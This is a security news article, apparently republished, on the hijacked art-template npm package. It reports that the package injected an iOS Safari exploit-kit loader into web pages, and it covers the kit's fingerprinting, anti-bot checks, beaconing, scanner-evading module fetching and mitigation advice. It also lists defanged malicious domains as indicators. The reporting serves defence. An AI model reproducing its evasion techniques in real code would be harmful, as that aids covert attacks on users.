A sophisticated supply chain attack has weaponized the widely used art-template npm package, transforming legitimate web applications into watering holes that deliver an iOS exploit kit targeting Apple devices. The backdoored package, maintained by an unknown actor who assumed control under false pretenses, silently injected malicious code into end users’ browsers across versions 4.13.3 through 4.13.6. Researchers at Socket.dev identified the campaign and linked it to the previously documented Coruna exploit framework, which they detailed in a report titled “Coruna Respawned.”
Attack Vector and Package Compromise
The attack began when the original maintainer of art-template, known as “aui,” transferred the package to an unknown actor under the guise of continued maintenance. The new controller almost immediately began weaponizing the library, with issue reports flagging suspicious behavior quietly deleted while malicious versions were pushed to suppress discovery. The compromise followed an escalating injection pattern: version 4.13.3 used encoding to hide a loader pointing to a suspicious external domain, while versions 4.13.5 and 4.13.6 dropped obfuscation entirely and injected a plaintext script loader directly into the package’s browser bundle file.
Any web application that included those affected versions would silently load and execute the exploit kit in every visitor’s browser. The scale of exposure is significant given art-template’s widespread adoption across JavaScript projects globally, turning unknowing developers into unwitting delivery vehicles for a targeted mobile attack against their own users.
Exploit Framework and Targeting Logic
The core implant functions as a watering hole exploit delivery framework, quietly fingerprinting each site visitor upon injection. It activates exclusively on Safari running iOS 11.0 through 17.2, and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher. Once a matching device is detected, the implant begins beaconing the victim’s public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds.
The implant employs five layers of anti-bot checks—including MathML rendering tests and a WebAssembly proof-of-work challenge—to confirm the target is a real person on actual hardware. Only after passing all checks does the framework fetch and execute the final server-gated payload, which is tailored to the victim’s iOS version across five distinct version bands. Researchers found the hard cutoff at iOS 17.3 aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed at that exact release, strongly suggesting browser-level exploitation rather than conventional phishing.
Infrastructure and Mitigation
The full delivery chain flows from the corrupted npm package directly to the victim’s device, with the implant using a content-addressed module system to conceal payloads from outside observers. Remote modules are fetched via URLs derived by hashing a secret session key with a module identifier, making them invisible to scanners that do not know the key. This design matches infrastructure patterns documented for the original Coruna kit, including identical XOR obfuscation confirmed by published YARA rules.
Developers are urged to audit dependency trees for art-template versions 4.13.3 through 4.13.6, lock dependencies, review browser bundle outputs for unexpected script loaders, and monitor outbound network requests from JavaScript runtimes. Any application deployed with affected versions should undergo an immediate security review, with indicators of compromise including domains such as v3.jiathis[.]com, utaq[.]cfww[.]shop, and l1ewsu3yjkqeroy[.]xyz.
This incident underscores the persistent vulnerability of open-source supply chains and the sophistication of modern watering hole attacks. As maintainer handoffs become a common vector for compromise, the security community must demand greater transparency and verification in package ownership transitions—or risk seeing trusted libraries turned into silent delivery systems for targeted exploitation.
— Originally reported by Cyber Security News. Adapted and republished with editorial context for MacThreat.
![PSA: A security breach means you must update the ChatGPT Mac app [U]](https://macthreat.com/wp-content/uploads/2026/06/psa-a-security-breach-means-you-must-update-the-chatgpt-mac-1780416310-330x220.jpg)